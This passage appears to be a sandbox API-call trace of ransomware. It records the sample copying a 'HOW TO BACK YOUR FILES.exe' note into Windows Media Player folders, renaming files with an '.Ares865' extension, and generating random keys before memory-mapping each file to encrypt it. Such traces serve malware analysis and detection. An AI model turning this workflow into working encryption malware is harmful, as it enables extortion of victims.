ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56a74860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56a74860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.325] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.325] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.326] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Media Player\\Visualizations", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Media Player\\Visualizations") returned="C:\\Program Files\\Windows Media Player\\Visualizations" [0062.326] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Media Player\\Visualizations" | out: lpString1="C:\\Program Files\\Windows Media Player\\Visualizations") returned="C:\\Program Files\\Windows Media Player\\Visualizations" [0062.326] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.326] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Media Player\\Visualizations\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows media player\\visualizations\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.330] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.330] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Visualizations\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56a74860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56a74860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.330] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.330] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.330] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Media Player\\Skins", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Media Player\\Skins") returned="C:\\Program Files\\Windows Media Player\\Skins" [0062.330] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Media Player\\Skins" | out: lpString1="C:\\Program Files\\Windows Media Player\\Skins") returned="C:\\Program Files\\Windows Media Player\\Skins" [0062.330] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.330] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Media Player\\Skins\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows media player\\skins\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.335] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.335] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Skins\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56a74860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56a74860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.335] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.335] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.335] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Media Player\\Network Sharing", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Media Player\\Network Sharing") returned="C:\\Program Files\\Windows Media Player\\Network Sharing" [0062.335] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Media Player\\Network Sharing" | out: lpString1="C:\\Program Files\\Windows Media Player\\Network Sharing") returned="C:\\Program Files\\Windows Media Player\\Network Sharing" [0062.335] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.335] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows media player\\network sharing\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.342] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.342] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56a9a9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56a9a9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.342] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.342] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.342] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.Ares865") returned 83 [0062.343] MoveFileExW (lpExistingFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml" (normalized: "c:\\program files\\windows media player\\network sharing\\connectionmanager.xml"), lpNewFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.Ares865" (normalized: "c:\\program files\\windows media player\\network sharing\\connectionmanager.xml.ares865"), dwFlags=0x1) returned 1 [0062.343] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml.Ares865" (normalized: "c:\\program files\\windows media player\\network sharing\\connectionmanager.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0062.343] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=5422) returned 1 [0062.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0062.344] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0062.344] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0062.344] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0062.345] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0062.345] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.345] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1830, lpName=0x0) returned 0x118 [0062.347] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1830) returned 0x1a0000 [0062.359] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0062.359] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0062.359] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.360] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0062.360] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.Ares865") returned 82 [0062.360] MoveFileExW (lpExistingFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml" (normalized: "c:\\program files\\windows media player\\network sharing\\contentdirectory.xml"), lpNewFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.Ares865" (normalized: "c:\\program files\\windows media player\\network sharing\\contentdirectory.xml.ares865"), dwFlags=0x1) returned 1 [0062.361] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml.Ares865" (normalized: "c:\\program files\\windows media player\\network sharing\\contentdirectory.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0062.361] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=8338) returned 1 [0062.361] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0062.362] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0062.362] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0062.362] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0062.362] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0062.363] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.363] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x23a0, lpName=0x0) returned 0x118 [0062.364] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x23a0) returned 0x1a0000 [0062.365] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0062.366] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0062.366] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.366] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0062.367] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.Ares865") returned 88 [0062.367] MoveFileExW (lpExistingFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml" (normalized: "c:\\program files\\windows media player\\network sharing\\mediareceiverregistrar.xml"), lpNewFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.Ares865" (normalized: "c:\\program files\\windows media player\\network sharing\\mediareceiverregistrar.xml.ares865"), dwFlags=0x1) returned 1 [0062.367] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml.Ares865" (normalized: "c:\\program files\\windows media player\\network sharing\\mediareceiverregistrar.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0062.368] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2574) returned 1 [0062.368] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0062.368] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0062.368] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0062.368] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0062.369] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0062.369] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.369] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd10, lpName=0x0) returned 0x118 [0062.370] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd10) returned 0x1a0000 [0062.371] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0062.372] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0062.372] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0062.373] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Media Player\\Media Renderer", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Media Player\\Media Renderer") returned="C:\\Program Files\\Windows Media Player\\Media Renderer" [0062.373] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Media Player\\Media Renderer" | out: lpString1="C:\\Program Files\\Windows Media Player\\Media Renderer") returned="C:\\Program Files\\Windows Media Player\\Media Renderer" [0062.373] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.373] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows media player\\media renderer\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.377] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.377] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56ae6c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56ae6c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.377] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.377] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.378] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml.Ares865") returned 76 [0062.378] MoveFileExW (lpExistingFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml" (normalized: "c:\\program files\\windows media player\\media renderer\\avtransport.xml"), lpNewFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml.Ares865" (normalized: "c:\\program files\\windows media player\\media renderer\\avtransport.xml.ares865"), dwFlags=0x1) returned 1 [0062.378] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml.Ares865" (normalized: "c:\\program files\\windows media player\\media renderer\\avtransport.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0062.379] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=19842) returned 1 [0062.379] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0062.379] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0062.379] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0062.379] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0062.380] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0062.380] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.380] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5090, lpName=0x0) returned 0x118 [0062.381] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5090) returned 0x1a0000 [0062.383] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0062.383] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0062.383] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.384] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0062.384] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.Ares865") returned 86 [0062.384] MoveFileExW (lpExistingFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml"), lpNewFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.Ares865" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml.ares865"), dwFlags=0x1) returned 1 [0062.388] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.Ares865" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0062.388] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=5375) returned 1 [0062.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0062.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0062.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0062.388] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0062.389] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0062.389] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.389] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1800, lpName=0x0) returned 0x118 [0062.391] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1800) returned 0x1a0000 [0062.392] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0062.393] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0062.393] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.393] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0062.393] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.Ares865") returned 81 [0062.393] MoveFileExW (lpExistingFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml" (normalized: "c:\\program files\\windows media player\\media renderer\\renderingcontrol.xml"), lpNewFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.Ares865" (normalized: "c:\\program files\\windows media player\\media renderer\\renderingcontrol.xml.ares865"), dwFlags=0x1) returned 1 [0062.394] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.Ares865" (normalized: "c:\\program files\\windows media player\\media renderer\\renderingcontrol.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0062.394] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=6363) returned 1 [0062.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0062.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0062.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0062.395] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0062.395] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0062.395] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.395] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1be0, lpName=0x0) returned 0x118 [0062.397] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1be0) returned 0x1a0000 [0062.398] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0062.398] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0062.398] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0062.399] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Media Player\\Icons", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Media Player\\Icons") returned="C:\\Program Files\\Windows Media Player\\Icons" [0062.399] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Media Player\\Icons" | out: lpString1="C:\\Program Files\\Windows Media Player\\Icons") returned="C:\\Program Files\\Windows Media Player\\Icons" [0062.399] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.399] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Media Player\\Icons\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows media player\\icons\\how to back your files.exe"), bFailIfExists=1) returned 0 [0062.400] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0062.400] GetLastError () returned 0x0 [0062.400] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0062.400] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0062.400] CloseHandle (hObject=0x120) returned 1 [0062.401] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.401] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Icons\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.401] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.401] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.401] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Media Player\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Media Player\\en-US") returned="C:\\Program Files\\Windows Media Player\\en-US" [0062.401] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Media Player\\en-US" | out: lpString1="C:\\Program Files\\Windows Media Player\\en-US") returned="C:\\Program Files\\Windows Media Player\\en-US" [0062.401] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.401] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Media Player\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows media player\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.406] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.406] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Media 